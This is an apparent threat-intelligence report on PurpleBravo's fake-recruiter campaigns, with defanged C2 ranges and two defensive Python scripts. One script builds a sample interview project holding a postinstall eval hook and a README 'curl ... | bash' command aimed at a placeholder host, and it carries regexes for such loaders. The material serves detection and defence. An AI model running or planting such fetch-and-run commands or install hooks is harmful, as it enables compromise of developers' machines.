Discover how PurpleBravo, a North Korean threat group, exploits fake job offers to target software supply chains, using RATs and infostealers like BeaverTail.
Analysis Summary
# Threat Actor: PurpleBravo (Associated with "Contagious Interview" campaign)
## Attribution & Identity
* **Attribution:** North Korean state-sponsored threat group.
* **Known Aliases/Associations:** Overlaps significantly with the "Contagious Interview" campaign. Associated names include CL-STA-0240, Famous Chollima, and Tenacious Pungsan. Shows meaningful intersections with PurpleDelta (North Korean IT workers).
## Activity Summary
PurpleBravo targets software developers, primarily in the software development and cryptocurrency verticals, through social engineering built around fake job offers. The group uses fraudulent LinkedIn personas and fictitious lure brands to deliver malware through interview coding tests and "ClickFix" prompts. Because many targets are job seekers who run the test on their employer's device, the scheme doubles as an overlooked entry point into the IT software supply chain. Activity tracked from August 2024 to September 2025 yielded thousands of potential target IP addresses.
## Tactics, Techniques & Procedures
- **Social Engineering:** Exploiting job seekers using fictitious recruiter outreach, fake job offers, and fictitious organizations/websites.
- **Malware Delivery:** Distributing malware via malicious GitHub repositories, interview coding tests, and ClickFix prompts.
- **Initial Access/Execution:** The candidate runs the malicious coding test (or pastes the ClickFix command) on a corporate device.
- **Collection:** Stealing browser credentials and cryptocurrency wallet information.
- **Command and Control:** Administering C2 servers via Astrill VPN and from IP ranges in China.
## Targeting
* **Sectors:** Software Development, Cryptocurrency, AI, Financial Services, IT Services, Marketing.
* **Geography (Victim Concentration):** Concentrated in South Asia and North America (by target IP count); additional targets observed in Europe, the Middle East, and Central America.
* **Victims:** Software developers; twenty potential victim organizations tracked. IT services and staff-augmentation firms are of particular concern because a compromise there can propagate to their downstream customers.
## Tools & Infrastructure
* **Malware Families Used:**
    * **BeaverTail:** JavaScript infostealer and loader.
    * **PyLangGhost:** Multi-platform Remote Access Trojan (RAT), optimized for credential theft.
    * **GolangGhost:** Multi-platform RAT, optimized for cryptocurrency wallet information theft.
    * **InvisibleFerret:** Python backdoor (mentioned in the general findings).
* **Infrastructure (C2, etc.):**
    * C2 servers hosted across seventeen distinct providers.
    * Observed C2 administration via Astrill VPN.
    * C2 server IP ranges concentrated in China (e.g., 36[.]35[.]56[.]0/24, 106[.]41[.]253[.]0/24, 223[.]104[.]143[.]0/24).
    * Observed C2 admin traffic utilizing IP addresses in Russia that intersect with activity linked to North Korean IT workers (PurpleDelta).
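The C2 ranges above are only useful if they are matched against egress telemetry from the hosts that actually run interview code. The following script is an added example (not tooling from the report): it refangs the CIDRs exactly as printed, parses a minimal firewall export, and flags connections from a developer subnet into any listed range. The log format, the `10.20.0.0/16` developer subnet and the sample lines are constructed assumptions.

```python
"""Flag outbound connections from developer workstations to the C2 ranges
quoted in the report. Added example, not tooling from the report. The log
format, the developer subnet and the sample lines are constructed assumptions."""
import ipaddress
import re
from typing import Dict, List, Optional


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 36[.]35[.]56[.]0/24 back into a parseable string."""
    return indicator.replace("[.]", ".")


# CIDRs from the infrastructure section, defanged exactly as the report prints them.
C2_RANGES = [ipaddress.ip_network(refang(c)) for c in (
    "36[.]35[.]56[.]0/24", "106[.]41[.]253[.]0/24", "223[.]104[.]143[.]0/24")]

# Assumption: developer workstations live in this subnet.
DEV_SUBNET = ipaddress.ip_network("10.20.0.0/16")

# Assumption: a minimal firewall export of the form "timestamp src dst:port action".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+)\s+(?P<dst>[\d.]+):(?P<port>\d+)\s+(?P<action>\w+)$")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one log line, or None for lines that do not fit the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_c2_hit(rec: Dict[str, str]) -> bool:
    """True when a developer host talks to any listed C2 range, regardless of port."""
    src = ipaddress.ip_address(rec["src"])
    dst = ipaddress.ip_address(rec["dst"])
    return src in DEV_SUBNET and any(dst in net for net in C2_RANGES)


def find_hits(lines: List[str]) -> List[Dict[str, str]]:
    """Parse each line, skip malformed ones, and keep only developer-to-C2 connections."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None and is_c2_hit(rec):
            hits.append(rec)
    return hits


# Constructed log lines; the last one is deliberately malformed.
SAMPLE_LOG = [
    "2025-09-01T10:00:01Z 10.20.4.17 36.35.56.120:443 ALLOW",
    "2025-09-01T10:00:02Z 10.20.4.17 142.250.72.14:443 ALLOW",
    "2025-09-01T10:00:03Z 10.30.1.5 106.41.253.9:8080 ALLOW",
    "2025-09-01T10:00:04Z 10.20.9.2 223.104.143.77:8443 ALLOW",
    "malformed line that should be skipped",
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}:{hit['port']} matches a reported C2 range")
```

These /24s belong to commercial providers and will also carry legitimate traffic, so treat a match as a lead to pivot on (which process opened the socket, whether it ran from a freshly cloned interview project) rather than a verdict on its own.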
## Implications
PurpleBravo presents an **acute software supply-chain risk**. By targeting IT service providers and staff-augmentation companies, compromises can easily propagate downstream to their numerous clients. The employment of deceptive, professional-looking personas makes detection difficult for individual job seekers.
## Mitigations
- Rigorous security vetting for external-facing communications and recruitment processes, especially those involving coding challenges or tests.
- Strict policies preventing employees from using corporate devices for unvetted external tasks (like coding interviews or running third-party scripts); take-home tests that must be run should be executed in a disposable VM or container with no access to corporate credentials, browser profiles or wallets.
- Enhanced network monitoring for traffic associated with known BeaverTail/RAT command-and-control characteristics, particularly outbound connections originating from developer workstations.
- Awareness training regarding social engineering tactics used by state-sponsored actors impersonating recruiters in the tech sector.
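The delivery vectors listed under Tactics, Techniques & Procedures (a coding-test repository that executes on install, and a ClickFix "paste this into your terminal" prompt) can be checked for before anything is run. The script below is an added example, not tooling from the report or from any vendor: it walks a take-home project, reports npm lifecycle hooks in `package.json`, flags common obfuscation constructs in JavaScript files, and looks for `curl ... | bash` style instructions in the documentation. The heuristics are generic and not derived from BeaverTail samples; the sample project it builds is constructed.

```python
"""Pre-flight check for a take-home coding challenge before it is installed or run.
Added example; the indicator patterns are generic heuristics (not derived from any
sample on the page) and the project built by build_sample_project() is constructed."""
import json
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Pattern, Tuple

Finding = Tuple[str, str, str]  # (category, path relative to project root, detail)

# npm runs these automatically during `npm install`, before any source file is opened.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
SKIP_DIRS = {"node_modules", ".git"}

# Leads for manual review, not verdicts: each is common in loaders, rare in interview code.
JS_PATTERNS: Dict[str, Pattern[str]] = {
    "dynamic-eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "process-spawn": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "charcode-decode": re.compile(r"String\.fromCharCode"),
    "long-encoded-blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
    "hex-escape-run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}
# ClickFix-style instruction: download and pipe straight into a shell.
SHELL_PIPE = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")


def scan_package_json(path: Path, root: Path) -> List[Finding]:
    """Report any lifecycle hook; a loader placed there runs on install, not on `npm start`."""
    rel = path.relative_to(root).as_posix()
    try:
        scripts = json.loads(path.read_text(encoding="utf-8")).get("scripts", {})
    except (ValueError, OSError):
        return [("unparseable-manifest", rel, "")]
    return [("lifecycle-hook", rel, f"{hook}: {scripts[hook]}")
            for hook in LIFECYCLE_HOOKS if hook in scripts]


def scan_text(path: Path, root: Path, patterns: Dict[str, Pattern[str]]) -> List[Finding]:
    """Report the first match of each pattern in a file, with its line number."""
    findings: List[Finding] = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    rel = path.relative_to(root).as_posix()
    for category, pattern in patterns.items():
        m = pattern.search(text)
        if m:
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((category, rel, f"line {line_no}: {m.group(0)[:60]}"))
    return findings


def scan_project(root_dir: str) -> List[Finding]:
    """Walk the project (skipping node_modules/.git) and collect all findings, sorted."""
    root = Path(root_dir)
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            path = Path(dirpath) / name
            if name == "package.json":
                findings += scan_package_json(path, root)
            elif path.suffix in (".js", ".mjs", ".cjs", ".ts"):
                findings += scan_text(path, root, JS_PATTERNS)
            elif path.suffix.lower() in (".md", ".txt"):
                findings += scan_text(path, root, {"shell-pipe": SHELL_PIPE})
    return sorted(findings)


def build_sample_project() -> str:
    """Constructed take-home project exhibiting the indicators above (not a real sample)."""
    root = Path(tempfile.mkdtemp(prefix="takehome-"))
    (root / "lib").mkdir()
    (root / "src").mkdir()
    (root / "package.json").write_text(json.dumps({
        "name": "interview-task", "version": "1.0.0",
        "scripts": {"start": "node src/index.js", "postinstall": "node lib/config.js"},
    }), encoding="utf-8")
    blob = "A" * 240  # stands in for an encoded second stage
    (root / "lib" / "config.js").write_text(
        f"const blob = '{blob}';\neval(Buffer.from(blob, 'base64').toString());\n",
        encoding="utf-8")
    (root / "src" / "index.js").write_text("console.log('hello');\n", encoding="utf-8")
    (root / "README.md").write_text(
        "Setup: run `curl -fsSL https://example.invalid/setup.sh | bash` first.\n",
        encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for category, rel, detail in scan_project(build_sample_project()):
        print(f"[{category}] {rel} {detail}")
```

Run it against the cloned repository before `npm install`; a clean run does not prove the project safe (a loader can hide in a dependency or behind a network fetch), so the install itself still belongs in a disposable VM with no corporate credentials on it.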